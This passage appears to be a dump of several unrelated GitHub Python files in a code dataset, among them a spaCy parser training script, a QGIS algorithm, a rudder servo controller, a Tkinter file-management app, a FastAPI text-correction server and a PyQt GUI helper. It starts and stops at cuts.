self.nb_primitives)]\n \n\n output_points = torch.cat(output_patches, dim=1)\n\n output = {\n 'faces': None,\n # 'points_1': pred_y1,\n # 'points_2': pred_y2,\n 'points_3': output_points.contiguous(), # batch, nb_prim, num_point, 3\n }\n return output\n","repo_name":"shahjui2000/674_Pro","sub_path":"src/styleatlasnet.py","file_name":"styleatlasnet.py","file_ext":"py","file_size_in_byte":11491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2181613340","text":"import spacy\nimport random\nfrom spacy.util import minibatch, compounding\nfrom spacy.language import Language\nfrom spacy.tokens import Doc, Token, Span\n\nmodel_name = 'C:\\Proyectos\\AnalisiLogica\\it_model_mons'\n\n\nclass NLPCustomRules(object):\n Token.set_extension(\"is_name\", default=False)\n\n def new_component(doc):\n\n #print(\"After tokenization, this doc has {} tokens.\".format(len(doc)))\n #print(\"The part-of-speech tags are:\", [token.pos_ for token in doc])\n\n for token in doc:\n if token.text == 'Formatisi':\n token._.is_name = ' Formare'\n\n #if len(doc) < 10:\n #print(\"This is a pretty short document.\")\n\n return doc\n\n#Model factories\nLanguage.factories['parser1'] = lambda nlp, **cfg: NLPCustomRules.new_component(nlp, **cfg)\n\nnlp = spacy.load('it_core_news_sm')\n\nnlp.add_pipe(NLPCustomRules.new_component, name='parser1', last=True)\n\n# Parser training data\nTRAIN_DATA = [\n (\n \"gioca in cucina\",\n {\n \"heads\": [0, 2, 0],\n \"deps\": [\"ROOT\", \"PLACE\", \"ROOT\"],\n },\n ),\n (\n \"corre nel salone\",\n {\n \"heads\": [0, 2, 0],\n \"deps\": [\"ROOT\", \"PLACE\", \"ROOT\"],\n },\n )\n\n]\n\n\n#nlp = spacy.load(\"it_core_news_sm\")\n\n# We'll use the built-in dependency parser class, but we want to create a\n# fresh instance – just in case.\nif \"parser1\" in nlp.pipe_names:\n nlp.remove_pipe(\"parser1\")\n\nparser1 = nlp.create_pipe(\"parser1\")\nnlp.add_pipe(parser1, first=True)\n\nfor text, annotations in TRAIN_DATA:\n for dep in annotations.get(\"deps\", []):\n parser1.add_label(dep)\n\npipe_exceptions = [\"parser1\", \"trf_wordpiecer\", \"trf_tok2vec\"]\nother_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]\n\nn_iter = 7\n\nwith nlp.disable_pipes(*other_pipes):\n optimizer = nlp.begin_training()\n for itn in range(n_iter):\n random.shuffle(TRAIN_DATA)\n losses = {}\n # batch up the examples using spaCy's minibatch\n batches = minibatch(TRAIN_DATA, size=compounding(4.0, 32.0, 1.001))\n for batch in batches:\n texts, annotations = zip(*batch)\n nlp.update(texts, annotations, sgd=optimizer, losses=losses)\n print(\"Losses\", losses)\n\n\n#Save the model\nnlp.to_disk(model_name)\n\n\nnlp = spacy.load(model_name)\n\ndoc = nlp(\"Il vento scuote i rami degli alberi.\")\n\nprint(nlp.pipeline)\n\nprint([(t.text, t.dep_, t.head.text) for t in doc if t.dep_ != \"-\"])\n\n\n\n\n\n\n\ntextcat = nlp.get_pipe(\"my_component11\")\n#nlp.disable_pipes(\"my_component\")\n\n\nfor text, annotations in TRAIN_DATA:\n for dep in annotations.get(\"deps\", []):\n textcat.add_label(dep)\n\n\npipe_exceptions = [\"textcat\"]\nother_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]\n\nn_iter = 7\n\nwith nlp.disable_pipes(*other_pipes):\n optimizer = nlp.begin_training()\n for itn in range(n_iter):\n random.shuffle(TRAIN_DATA)\n losses = {}\n # batch up the examples using spaCy's minibatch\n batches = minibatch(TRAIN_DATA, size=compounding(4.0, 32.0, 1.001))\n for batch in batches:\n texts, annotations = zip(*batch)\n nlp.update(texts, annotations, sgd=optimizer, losses=losses)\n print(\"Losses\", losses)\n\n\ndef my_component(doc):\n print(\"After tokenization, this doc has {} tokens.\".format(len(doc)))\n print(\"The part-of-speech tags are:\", [token.pos_ for token in doc])\n\n Token.set_extension('is_name', default=False)\n\n for token in doc:\n if token.text == 'Formatisi':\n token._.is_name = ' Formare'\n\n if len(doc) < 10:\n print(\"This is a pretty short document.\")\n return doc\n\n\nTRAIN_DATA = [\n (\n \"gioca in cucina\",\n {\n \"heads\": [0, 2, 0],\n \"deps\": [\"ROOT\", \"PLACE\", \"ROOT\"],\n },\n ),\n (\n \"corre nel salone\",\n {\n \"heads\": [0, 2, 0],\n \"deps\": [\"ROOT\", \"PLACE\", \"ROOT\"],\n },\n )\n\n]\n","repo_name":"SimoneMons/phtree_analisiLogica","sub_path":"TrainingHeadsDep.py","file_name":"TrainingHeadsDep.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28819593982","text":"# -*- coding: utf-8 -*-\nfrom qgis.PyQt.QtCore import QCoreApplication\nfrom qgis.core import (QgsProcessing,\n QgsFeatureSink,\n QgsProcessingAlgorithm,\n QgsProcessingParameterFeatureSink,\n QgsCoordinateReferenceSystem,\n QgsProcessingParameterMultipleLayers,\n QgsFeatureRequest,\n QgsExpression,\n QgsFeature\n )\nfrom qgis import processing\nfrom qgis.utils import iface\nclass IdentifyMultipleParts(QgsProcessingAlgorithm): \n\n INPUT_LAYERS = 'INPUT_LAYER_LIST'\n OUTPUT = 'OUTPUT'\n\n def initAlgorithm(self, config=None):\n self.addParameter(\n QgsProcessingParameterMultipleLayers(\n 'INPUT_LAYER_LIST',\n self.tr('Selecionar camadas'),\n QgsProcessing.TypeVectorAnyGeometry\n )\n )\n self.addParameter(\n QgsProcessingParameterFeatureSink(\n self.OUTPUT,\n self.tr('Flag Multiplas Partes')\n )\n ) \n def processAlgorithm(self, parameters, context, feedback): \n feedback.setProgressText('Procurando multi geometria com mais de uma parte...')\n layerList = self.parameterAsLayerList(parameters,'INPUT_LAYER_LIST', context)\n CRSstr = iface.mapCanvas().mapSettings().destinationCrs().authid()\n CRS = QgsCoordinateReferenceSystem(CRSstr)\n #4 = multipoint, 5 = multiline, 6 = multipolygon\n featuresToAdd = {4:[], 5:[], 6:[]}\n newLayer = {4:False, 5:False, 6:False}\n step = 0\n listSize = len(layerList)\n progressStep = 100/listSize if listSize else 0\n returnMessage = 'nenhuma inconsistência encontrada'\n\n for step,layer in enumerate(layerList):\n if feedback.isCanceled():\n return {self.OUTPUT: outputLog}\n expr = QgsExpression( \"num_geometries( $geometry ) > 1\" )\n for feature in layer.getFeatures(QgsFeatureRequest(expr)): \n featuresToAdd[feature.geometry().wkbType()].append(feature) \n feedback.setProgress( step * progressStep )\n for key in featuresToAdd:\n if not len(featuresToAdd[key]) == 0:\n newLayer[key] = self.outLayer(parameters, context, featuresToAdd[key], CRS, key)\n returnMessage = 'camada(s) com inconsistência(s) gerada(s)'\n return{self.OUTPUT: returnMessage}\n \n def outLayer(self, parameters, context, features, CRS, geomType):\n newFields = features[0].fields()\n\n (sink, newLayer) = self.parameterAsSink(\n parameters,\n self.OUTPUT,\n context,\n newFields,\n geomType,\n CRS\n )\n \n for feature in features:\n newFeat = QgsFeature()\n newFeat.setGeometry(feature.geometry())\n newFeat.setFields(newFields)\n for field in range(len(feature.fields())):\n newFeat.setAttribute((field), feature.attribute((field)))\n sink.addFeature(newFeat, QgsFeatureSink.FastInsert)\n \n return newLayer\n \n def tr(self, string):\n return QCoreApplication.translate('Processing', string)\n\n def createInstance(self):\n return IdentifyMultipleParts()\n\n def name(self):\n return 'identifymultipleparts'\n\n def displayName(self):\n return self.tr('Identifica Geometria com Multiplas Partes')\n\n def group(self):\n return self.tr('Missoes')\n\n def groupId(self):\n return 'missoes'\n\n def shortHelpString(self):\n return self.tr(\"O algoritmo identifica se existe alguma geometria com mais de uma parte\")\n \n","repo_name":"1cgeo/ferramentas_experimentais","sub_path":"processings/identifyMultipleParts.py","file_name":"identifyMultipleParts.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20496163702","text":"import os\nimport numpy as np\n \nclass Rudder:\n \n def __init__(self, pin, nav, pi):\n \n self.pi = pi\n self.pin = pin\n self.right = 600\n self.mid = 1134\n self.left = 1800\n \n self.degrees = np.linspace(self.right, self.mid, 60).tolist() + np.linspace(self.mid, self.left, 60).tolist()\n \n for i, d in enumerate(self.degrees):\n self.degrees[i] = int(round(d, 0))\n \n \n def set_heading(self, heading : int) -> None:\n \n hz = self.degrees[heading+59]\n self.pi.set_servo_pulsewidth(self.pin, hz)\n\n\n def heading_compansation(self, offset) -> None:\n\n #print(f\"[RUDDER] Offset compansation: {offset}\")\n \n head = 1\n diff_offset = abs(offset)\n if offset < 0:\n head = -1\n\n if diff_offset > 90:\n self.set_heading(40*head)\n elif diff_offset > 45:\n self.set_heading(20*head)\n elif diff_offset > 30:\n self.set_heading(15*head)\n elif diff_offset > 10:\n self.set_heading(10*head)\n elif diff_offset > 5:\n self.set_heading(5*head)\n\n","repo_name":"DenEkteTruls/Hydromapper","sub_path":"nav/rudder.py","file_name":"rudder.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42755946068","text":"\r\n # Used for performing operating system related operations like listing files, deleting files, etc.\r\nimport os\r\n# Used for high-level file operations like moving files, copying files, etc.\r\nimport shutil \r\n# Used to create GUI windows and widgets\r\nimport tkinter as tk \r\n# Used to create various GUI dialogs like file dialog, message box, etc.\r\nfrom tkinter import filedialog, messagebox, simpledialog\r\n# Module for working with JSON data \r\nimport json\r\n# for working with time-related functions\r\nimport time\r\n# for working with file paths\r\nfrom pathlib import Path\r\n\r\n#create class of app\r\nclass FileUtilityApp:\r\n def __init__(self):\r\n # main window of app with tk\r\n self.window = tk.Tk()\r\n self.window.title(\"File Editor\")\r\n self.window.geometry(\"600x710\")\r\n\r\n # top frame for the welcome label and description\r\n top_frame = tk.Frame(self.window)\r\n top_frame.pack(side=tk.TOP, padx=20, pady=20)\r\n\r\n # welcome heading\r\n welcome_label = tk.Label(\r\n top_frame, text=\"Welcome to File Editor\",\r\n font=(\"Helvetica\", 24, \"bold\")\r\n )\r\n welcome_label.pack()\r\n\r\n # multi line string app description\r\n app_description = (\r\n \"This application allows you to perform various file and folder operations.\\n\\n\"\r\n \"Features include:\\n\"\r\n \"- Searching files in a directory\\n\"\r\n \"- Moving files between directories\\n\"\r\n \"- Deleting files\\n\"\r\n \"- Creating new folders\\n\"\r\n \"- Viewing recent changes\\n\"\r\n \"- Saving recent changes to a file\\n\"\r\n \"- Viewing file properties\\n\"\r\n )\r\n description_label = tk.Label(\r\n top_frame, text=app_description, justify=tk.LEFT, font=(\"Helvetica\", 8, \"bold\")\r\n )\r\n description_label.pack(pady=5)\r\n\r\n # search button\r\n search_button = tk.Button(\r\n self.window, text=\"Search Files\", command=self.search_files,\r\n fg=\"#fff\", bg=\"#4CAF50\", activebackground=\"#3E8E41\", bd=0,\r\n padx=10, pady=5, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n search_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n # move button\r\n move_button = tk.Button(\r\n self.window, text=\"Move Files\", command=self.move_files,\r\n fg=\"#fff\", bg=\"#2196F3\", activebackground=\"#0E88B1\", bd=0,\r\n padx=16, pady=5, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n move_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n # delete button\r\n delete_button = tk.Button(\r\n self.window, text=\"Delete Files\", command=self.delete_files,\r\n fg=\"#fff\", bg=\"#F44336\", activebackground=\"#A92C25\", bd=0,\r\n padx=16, pady=5, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n delete_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n # the create folder button\r\n create_folder_button = tk.Button(\r\n self.window, text=\"Create Folder\", command=self.create_folder,\r\n fg=\"#fff\", bg=\"#FFC107\", activebackground=\"#E09600\", bd=0,\r\n padx=16, pady=5, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n create_folder_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n # recent changes button\r\n recent_changes_button = tk.Button(\r\n self.window, text=\"Recent Changes\", command=self.show_recent_changes,\r\n fg=\"#fff\", bg=\"#607D8B\", activebackground=\"#455A64\", bd=0,\r\n padx=16, pady=5, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n recent_changes_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n # save recent changes button\r\n save_changes_button = tk.Button(\r\n self.window, text=\"Save Recent Changes\", command=self.save_recent_changes,\r\n fg=\"#fff\", bg=\"#9C27B0\", activebackground=\"#6A1B9A\", bd=0,\r\n padx=16, pady=5, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n save_changes_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n\r\n # empty list for self class, used to store recent changes\r\n self.recent_changes = []\r\n\r\n # view file properties button\r\n view_file_properties_button = tk.Button(\r\n self.window, text=\"View File Properties\", command=self.view_file_properties,\r\n fg=\"#fff\", bg=\"#009688\", activebackground=\"#00695C\", bd=0,\r\n padx=16, pady=8, font=(\"Helvetica\", 14, \"bold\"),\r\n borderwidth=2, relief=\"solid\", highlightthickness=1, highlightcolor=\"#000\"\r\n )\r\n view_file_properties_button.pack(padx=10, pady=5, anchor=\"w\")\r\n\r\n def search_files(self):\r\n # Show a file dialog box to choose the directory to search in\r\n directory = filedialog.askdirectory(title=\"Select Directory to Search In\")\r\n if directory:\r\n # Show a message box with the list of files found in the directory\r\n files = os.listdir(directory)\r\n message = f\"Files found in {directory}:\\n\\n{files}\"\r\n messagebox.showinfo(\"Search Results\", message)\r\n\r\n def move_files(self):\r\n # Show a file dialog box to choose the file to move\r\n source_file = filedialog.askopenfilename(title=\"Select File to Move\")\r\n if source_file:\r\n # Show a file dialog box to choose the destination directory\r\n destination_dir = filedialog.askdirectory(\r\n title=\"Select Destination Directory\"\r\n )\r\n if destination_dir:\r\n try:\r\n # Move the file to the destination directory\r\n destination_file = os.path.join(\r\n destination_dir, os.path.basename(source_file)\r\n )\r\n shutil.move(source_file, destination_file)\r\n # Add the time, file name, and description of the change to the recent changes list\r\n modification_time = os.path.getmtime(destination_file)\r\n change_description = f\"{source_file} moved to {destination_file}\"\r\n self.recent_changes.append(f\"{change_description} ({modification_time})\")\r\n # Show a message box to confirm that the move was successful\r\n messagebox.showinfo(\r\n \"Move Successful\", f\"{source_file} moved to {destination_file}\"\r\n )\r\n except Exception as e:\r\n # Show an error message box if the move operation failed\r\n messagebox.showerror(\r\n \"Error\", f\"Error moving file: {str(e)}\"\r\n )\r\n\r\n def delete_files(self):\r\n # Show a file dialog box to choose the file to delete\r\n file_to_delete = filedialog.askopenfilename(title=\"Select File to Delete\")\r\n if file_to_delete:\r\n # Add the time, file name, and description of the change to the recent changes list\r\n modification_time = os.path.getmtime(file_to_delete)\r\n change_description = f\"{file_to_delete} deleted\"\r\n self.recent_changes.append(f\"{change_description} ({modification_time})\")\r\n # Show a message box to confirm that the user really wants to delete the file\r\n if messagebox.askyesno(\r\n \"Confirm Delete\", f\"Are you sure you want to delete {file_to_delete}?\"\r\n ):\r\n # Delete the file\r\n os.remove(file_to_delete)\r\n # Show a message box to confirm that the delete was successful\r\n messagebox.showinfo(\"Delete Successful\", f\"{file_to_delete} deleted\")\r\n\r\n # function to create a new folder\r\n def create_folder(self):\r\n # Show a file dialog box to choose the directory to create the folder in\r\n directory = filedialog.askdirectory(\r\n title=\"Select Directory to Create Folder In\"\r\n )\r\n if directory:\r\n # Show an entry dialog box to get the name of the new folder\r\n folder_name = simpledialog.askstring(\r\n \"Create Folder\", \"Enter the name of the new folder:\"\r\n )\r\n if folder_name:\r\n # Create the new folder\r\n new_folder = os.path.join(directory, folder_name)\r\n os.mkdir(new_folder)\r\n # Add the time and folder name to the recent changes list\r\n modification_time = os.path.getmtime(new_folder)\r\n self.recent_changes.append(f\"{new_folder} ({modification_time})\")\r\n # Show a message box to confirm that the folder was created\r\n messagebox.showinfo(\"Folder Created\", f\"Folder {new_folder} created\")\r\n\r\n # function to display recent changes\r\n def show_recent_changes(self):\r\n # Show a message box with the list of recent changes\r\n message = \"Recent changes:\\n\\n\" + \"\\n\".join(self.recent_changes)\r\n messagebox.showinfo(\"Recent Changes\", message)\r\n\r\n # save the recent changes\r\n def save_recent_changes(self):\r\n # Show a file dialog box to choose the file to save to\r\n file_to_save = filedialog.asksaveasfilename(\r\n title=\"Save Recent Changes As\",\r\n defaultextension=\".txt\",\r\n filetypes=[(\"Text Files\", \"*.txt\"), (\"All Files\", \"*.*\")],\r\n )\r\n if file_to_save:\r\n # Write the recent changes list to the file\r\n with open(file_to_save, \"w\") as f:\r\n f.write(\"\\n\".join(self.recent_changes))\r\n # Show a message box to confirm that the save was successful\r\n messagebox.showinfo(\"Save Successful\", f\"Recent changes saved to {file_to_save}\")\r\n\r\n\r\n def view_file_properties(self):\r\n # Show a file dialog box to choose the file\r\n file_to_view = filedialog.askopenfilename(title=\"Select File to View Properties\")\r\n if file_to_view:\r\n # Get the file properties using the get_file_properties function\r\n file_properties = self.get_file_properties(file_to_view)\r\n \r\n # Create a mini frame (Toplevel) to display the file properties as a separate window\r\n mini_frame = tk.Toplevel(self.window)\r\n mini_frame.title(\"File Properties\")\r\n mini_frame.geometry(\"400x300\")\r\n\r\n # Add a scrollbar to the mini frame for easier navigation of the content\r\n scrollbar = tk.Scrollbar(mini_frame)\r\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\r\n \r\n # Create a text widget to display the JSON content of the file properties\r\n text_widget = tk.Text(mini_frame, wrap=tk.WORD, yscrollcommand=scrollbar.set)\r\n # Insert the file properties (formatted as JSON with indents) into the text widget\r\n text_widget.insert(tk.END, json.dumps(file_properties, indent=2))\r\n # Add the text widget to the mini frame and fill it to the available space\r\n text_widget.pack(expand=True, fill=tk.BOTH)\r\n \r\n # Configure the scrollbar to control the text widget's vertical scrolling\r\n scrollbar.config(command=text_widget.yview)\r\n\r\n def get_file_properties(self, file_path):\r\n # Use the pathlib.Path object to represent the file path\r\n file = Path(file_path)\r\n # Get the file's stat object, which contains information about the file\r\n file_stat = file.stat()\r\n \r\n # i made dictionary of the file properties using the stat object and pathlib.Path attributes\r\n properties = {\r\n \"name\": file.name, # File name\r\n \"path\": str(file), # Full file path as a string\r\n \"size\": file_stat.st_size, # File size in bytes\r\n \"created\": time.ctime(file_stat.st_ctime), # Creation time as a string\r\n \"modified\": time.ctime(file_stat.st_mtime), # Modification time as a string\r\n \"accessed\": time.ctime(file_stat.st_atime), # Access time as a string\r\n }\r\n \r\n # Return the dictionary containing the file properties\r\n return properties\r\n\r\n # run the tkinter window\r\n def run(self):\r\n self.window.mainloop()\r\n\r\n# create a FileUtilityApp object and run the application\r\nif __name__ == \"__main__\":\r\n app = FileUtilityApp()\r\n app.run()\r\n","repo_name":"jcast6/file-edit-app","sub_path":"file_editor.py","file_name":"file_editor.py","file_ext":"py","file_size_in_byte":12814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23775795463","text":"from tensorflow.python.framework.tensor_conversion_registry import get\nimport uvicorn\nfrom fastapi import FastAPI\nfrom correct_teencode import correct_teencode\nfrom correct_telex import TelexErrorCorrector\nfrom pydantic import BaseModel\nfrom accent import get_accented\n\ntelexCorrector = TelexErrorCorrector()\n\napp = FastAPI()\n\n\nclass Request(BaseModel):\n text: str\n\n\n@app.post(\"/correct-teencode\")\ndef teencode(data: Request):\n data = data.dict()\n corrected = correct_teencode(data[\"text\"])\n return {\"result\": corrected}\n\n\n@app.post(\"/correct-telex\")\ndef telex(data: Request):\n data = data.dict()\n corrected = telexCorrector.fix_telex_sentence(data[\"text\"])\n return {\"result\": corrected}\n\n@app.post(\"/correct-accent\")\ndef accent(data: Request):\n data = data.dict()\n corrected = get_accented(data[\"text\"])\n return {\"result\": corrected}\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", port=5000)\n","repo_name":"duytran-vio/correct_teencode","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31856859618","text":"config = dict(\n \n # training\n load_saved_model = True,\n num_epoch = 200,\n batch_size = 8,\n learning_rate = 3e-4,\n\n # video\n in_channels = 3, # image\n image_H = 96,\n image_W = 96,\n\n # audio \n audio_dim = 64, # number of mfcc coef\n\n # model\n dim = 128, \n patch_size_h = 32, # patch size must be devisive by image size\n patch_size_w = 32,\n max_num_frames = 256, # input max seq len\n depth = 6,\n heads = 4,\n pool = 'cls',\n dim_head = 64,\n dropout = 0.2,\n emb_dropout = 0.2,\n scale_dim = 4,\n audio_scale = 4, # for vivit_w_audio_v2\n\n # loader\n num_workers = 4,\n)","repo_name":"Ethan07902050/ttm","sub_path":"ViViT-w-Audio/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11856139156","text":"from PyQt4.QtCore import Qt,SIGNAL\r\nfrom PyQt4.QtGui import QAction,QToolBar,QIcon\r\nfrom elm_tools import MouseTool,SelectTool\n\r\nclass ElmGUI (object) :\r\n\t\"\"\"an empty implementation of a GUI that do nothing\r\n\t\"\"\"\r\n\tdef __init__ (self) :\r\n\t\t\"\"\"initialize the GUI.\r\n\t\t\"\"\"\r\n\t\tself._created = False\n\t\tself._installed = None\r\n\t\r\n\t###########################################\r\n\t#\r\n\t#\t\tGUI interface\r\n\t#\r\n\t###########################################\r\n\tdef setup_ui (self) :\n\t\t\"\"\"Create all GUI components.\n\t\t\n\t\treturn True if components need to be created\n\t\t\"\"\"\n\t\tif self._created :\n\t\t\t#do nothing, this method has already been called\n\t\t\treturn False\n\t\telse :\n\t\t\tself._created = True\n\t\t\treturn True\r\n\t\n\tdef clean (self) :\n\t\t\"\"\"Clean the gui if needed.\n\t\t\"\"\"\n\t\tpass\n\t\n\tdef installed (self) :\n\t\t\"\"\"Return the viewer in which this gui\n\t\tis currently installed or None if\n\t\tthe gui is not installed\n\t\t\"\"\"\n\t\treturn self._installed\n\t\r\n\tdef install (self, main_window) :\r\n\t\t\"\"\"Install all GUI components in the main window.\n\t\t\"\"\"\n\t\tself._installed = main_window\r\n\t\r\n\tdef uninstall (self, main_window) :\r\n\t\t\"\"\"Uninstall all GUI components from the main window.\n\t\t\"\"\"\n\t\tself._installed = None\r\n\t\n\tdef emit (self, signal, args) :\n\t\t\"\"\"Force the viewer to emit a signal.\n\t\tIf the GUI is not installed do nothing.\n\t\t\"\"\"\n\t\tmw = self.installed()\n\t\tif mw is not None :\n\t\t\tmw.emit(SIGNAL(signal),args)\n\t\n\t###########################################\r\n\t#\r\n\t#\t\thelp functions to install GUI elements\r\n\t#\r\n\t###########################################\n\tdef add_action_bar (self, main_window, bar) :\n\t\t\"\"\"Add a toolbar that contains actions.\n\t\t\"\"\"\n\t\tmain_window.addToolBar(bar)\n\t\tbar.show()\n\t\n\tdef add_tool_bar (self, main_window,\n\t bar,\n\t bar_position = Qt.LeftToolBarArea) :\n\t\t\"\"\"Add a toolbar that contains tools.\n\t\t\"\"\"\n\t\tmain_window.addToolBar(bar_position,bar)\n\t\tbar.show()\n\t\tfor action in bar.actions() :\n\t\t\tif isinstance(action,MouseTool) :\n\t\t\t\tmain_window.add_tool(action)\n\t\n\tdef remove_bar (self, main_window, bar) :\n\t\t\"\"\"Remove a toolbar from viewer\n\t\teither containing tools or actions.\n\t\t\"\"\"\n\t\tmain_window.removeToolBar(bar)\n\t\tbar.setParent(None)\n\t\tfor action in bar.actions() :\n\t\t\tif isinstance(action,MouseTool) :\n\t\t\t\tmain_window.remove_tool(action)\n\t\n\tdef add_status_widget (self, main_window, widget, is_permanent = True) :\n\t\t\"\"\"Add a widget in the status bar.\n\t\t\"\"\"\n\t\tif is_permanent :\n\t\t\tmain_window.statusBar().addPermanentWidget(widget)\n\t\telse :\r\n\t\t\tmain_window.statusBar().addWidget(widget)\n\t\twidget.show()\n\t\n\tdef remove_status_widget (self, main_window, widget) :\n\t\t\"\"\"Remove a widget from the status bar.\n\t\t\n\t\tAs soon as there is no more visible widgets,\n\t\tremove the status bar.\n\t\t\"\"\"\n\t\tstatus = main_window.statusBar()\n\t\tstatus.removeWidget(widget)\n\t\twidget.setParent(None)\n\t\tif len(status.children() ) == 2 :\n\t\t\tmain_window.setStatusBar(None)\n\nclass TemplateGUI (ElmGUI) :\n\t\"\"\"A custom class to interactively add elements to a GUI.\n\t\"\"\"\n\tdef __init__ (self, name) :\n\t\tElmGUI.__init__(self)\n\t\tself._name = name\n\t\tself._action_bar = None\n\t\tself._actions = []\n\t\tself._tool_bar = None\n\t\tself._tools = []\n\t\tself._tool_bar_position = Qt.LeftToolBarArea\n\t\n\t###############################################\n\t#\n\t#\t\taccess to attributes\n\t#\n\t###############################################\n\tdef set_tools_position (self, position) :\n\t\t\"\"\"Set the position of the toolbar.\n\t\t\n\t\tposition: a string, either 'left' or 'bottom'.\n\t\t\"\"\"\n\t\tif position == \"left\" :\n\t\t\tself._tool_bar_position = Qt.LeftToolBarArea\n\t\telif position == \"bottom\" :\n\t\t\tself._tool_bar_position = Qt.BottomToolBarArea\n\t\telse :\n\t\t\traise UserWarning(\"position '%s' not recognized (either left or bottom)\" % str(position) )\n\t\n\tdef create_action (self, name, func, icon, descr) :\n\t\t\"\"\"Create an action from its description.\n\t\tassert action_bar is not None.\n\t\t\"\"\"\n\t\taction = self._action_bar.addAction(name)\n\t\tif icon is not None :\n\t\t\tif isinstance(icon,QIcon) :\n\t\t\t\taction.setIcon(icon)\n\t\t\telse :\n\t\t\t\taction.setIcon(QIcon(icon) )\n\t\tif descr == \"\" :\n\t\t\taction.setToolTip(name)\n\t\telse :\n\t\t\taction.setToolTip(descr)\n\t\taction.connect(action,SIGNAL(\"triggered(bool)\"),func)\n\t\treturn action\n\t\t\n\tdef add_action_descr (self, name, func, icon = None, descr = \"\") :\n\t\t\"\"\"Add a new action from its description.\n\t\t\"\"\"\n\t\tif self._action_bar is None :\n\t\t\tself._actions.append( (name,func,icon,descr) )\n\t\telse :\n\t\t\tself._actions.append(self.create_action(name,func,icon,descr) )\n\t\n\tdef add_action (self, action) :\n\t\t\"\"\"Add a new action to the GUI.\n\t\t\"\"\"\n\t\tself._actions.append(action)\n\t\tif self._action_bar is not None :\n\t\t\tself._action_bar.addAction(action)\n\t\n\tdef create_tool (self, name, func, draw_func, icon, descr) :\n\t\t\"\"\"Create a new tool from its description.\n\t\tassert tool_bar is not None.\n\t\t\"\"\"\n\t\ttoolbar = self._tool_bar\n\t\ttool = SelectTool(toolbar,name,draw_func)\n\t\ttoolbar.addAction(tool)\n\t\tif icon is not None :\n\t\t\tif isinstance(icon,QIcon) :\n\t\t\t\ttool.setIcon(icon)\n\t\t\telse :\n\t\t\t\ttool.setIcon(QIcon(icon) )\n\t\tif descr == \"\" :\n\t\t\ttool.setToolTip(name)\n\t\telse :\n\t\t\ttool.setToolTip(descr)\n\t\t\n\t\ttool.connect(tool,SIGNAL(\"elm selected\"),func)\n\t\treturn tool\n\t\n\tdef add_tool_descr (self, name, func, draw_func, icon = None, descr = \"\") :\n\t\t\"\"\"Add a new tool from its description.\n\t\t\"\"\"\n\t\tif self._tool_bar is None :\n\t\t\tself._tools.append( (name,func,draw_func,icon,descr) )\n\t\telse :\n\t\t\tself._tools.append(self.create_tool(name,func,draw_func,icon,descr) )\n\t\n\tdef add_tool (self, tool) :\n\t\t\"\"\"Add a new tool to the GUI.\n\t\t\"\"\"\n\t\tself._tools.append(tool)\n\t\tif self._tool_bar is not None :\n\t\t\tself._tool_bar.addAction(tool)\n\t\n\t###############################################\n\t#\n\t#\t\tsubclass ElmGUI\n\t#\n\t###############################################\n\tdef setup_ui (self) :\n\t\tif ElmGUI.setup_ui(self) :\n\t\t\tself._action_bar = QToolBar(\"action_%s\" % self._name)\n\t\t\tfor i,action in enumerate(self._actions) :\n\t\t\t\tif not isinstance(action,QAction) :\n\t\t\t\t\taction = self.create_action(*action)\n\t\t\t\t\tself._actions[i] = action\n\t\t\t\tself._action_bar.addAction(action)\n\t\t\t\n\t\t\tself._tool_bar = QToolBar(\"tool_%s\" % self._name)\n\t\t\tfor i,tool in enumerate(self._tools) :\n\t\t\t\tif not isinstance(tool,QAction) :\n\t\t\t\t\ttool = self.create_tool(*tool)\n\t\t\t\t\tself._tools[i] = tool\n\t\t\t\tself._tool_bar.addAction(tool)\n\t\t\t\n\t\t\treturn True\n\t\telse :\n\t\t\treturn False\n\t\n\tdef install (self, main_window) :\n\t\tElmGUI.install(self,main_window)\n\t\tif len(self._action_bar.actions() ) > 0 :\n\t\t\tself.add_action_bar(main_window,self._action_bar)\n\t\tif len(self._tool_bar.actions() ) > 0 :\n\t\t\tself.add_tool_bar(main_window,\n\t\t\t self._tool_bar,\n\t\t\t self._tool_bar_position)\n\t\n\tdef uninstall (self, main_window) 